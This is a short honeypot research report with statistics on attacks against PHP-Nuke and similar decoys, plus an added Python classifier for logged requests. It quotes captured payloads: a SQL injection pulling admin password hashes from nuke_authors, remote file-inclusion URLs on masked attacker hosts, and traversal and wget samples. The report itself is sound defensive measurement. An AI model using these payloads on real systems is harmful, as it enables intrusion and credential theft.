Web-based Honeypot Decoys: Results II

Here are some more statistics regarding the data we have collected with the help of Michael Müter's web-based honeypot decoys. PHP-Nuke is the most attractive target, presumably due to its large number of past security vulnerabilities and its large user base. We commonly see file inclusion or SQL injection attempts. These attacks often try to install backdoors written in PHP or defacing tools like the one from r3v3ng4ns.

Attacks per module:
PHP-Nuke: 266 Hits [81.85%]
php Shell: 49 Hits [15.08%]
phpBB: 5 Hits [1.54%]
phpMyAdmin: 5 Hits [1.54%]

Attack Types:
File Inclusion: 167 Hits [51.38%]
SQL injection: 110 Hits [33.85%]
Injection: 30 Hits [9.23%]
WGET: 14 Hits [4.31%]
XSS: 4 Hits [1.23%]
Defacement attempt: 3 Hits [0.92%]
Directory traversal: 3 Hits [0.92%]

Most often used attack patterns (sanitized):
http://www.XXXzero.com/wp-admin/c.in? : 36 Hits [11.08%]
p0hh0nsee%\') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* : 34 Hits [10.46%]
http://XXXzero.com/c.in?? : 33 Hits [10.15%]
uname -a : 18 Hits [5.54%]
http://XXXbergsbuss.se/c.in? : 16 Hits [4.92%]
http://XXX.laughingllamas.com/fileupload/store/check.txt? : 5 Hits [1.54%]
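
An added example, not the honeypot's own code: one way to bucket logged request parameter values into the attack types tallied above and print them in the same "N Hits [x%]" form. The regex rules, their ordering and all sample values (including the `.invalid` hosts) are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Heuristic rules (assumed, not the decoys' real logic); first match wins.
RULES = [
    ("SQL injection", re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)),
    ("File Inclusion", re.compile(r"^(?:https?|ftp)://", re.I)),  # value is a remote URL
    ("Injection", re.compile(r"^(?:uname|id|whoami)\b", re.I)),   # bare shell command
    ("WGET", re.compile(r"\bwget\b", re.I)),
    ("Directory traversal", re.compile(r"\.\./")),
    ("XSS", re.compile(r"<\s*script", re.I)),
]

def classify(value: str) -> str:
    """Return the attack type for one logged parameter value."""
    decoded = unquote(value).strip()  # match on the percent-decoded form
    for label, pattern in RULES:
        if pattern.search(decoded):
            return label
    return "Unclassified"

def tally(values):
    """Return (label, hits, percent) rows, most frequent first."""
    counts = Counter(classify(v) for v in values)
    total = sum(counts.values())
    return [(label, n, round(100.0 * n / total, 2))
            for label, n in counts.most_common()]

def report(values) -> str:
    return "\n".join(f"{label}: {n} Hits [{pct:.2f}%]"
                     for label, n, pct in tally(values))

# Constructed sample log values (not captured data).
SAMPLE = [
    "http://decoy-a.invalid/c.in?",
    "http://decoy-b.invalid/c.in??",
    "http://decoy-a.invalid/c.in?",
    "x%27) UNION ALL SELECT 1,2,aid,pwd FROM nuke_authors/*",
    "1 union select pwd from nuke_authors",
    "uname -a",
    "wget http://decoy-c.invalid/tool.txt",
    "..%2F..%2F..%2Fetc%2Fpasswd",
]

if __name__ == "__main__":
    print(report(SAMPLE))
```
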

Captured Downloads:
Total number of captured tools: 36
Average size of a captured tool: 61.22kb
Total size of all captured tools: 2203.84kb
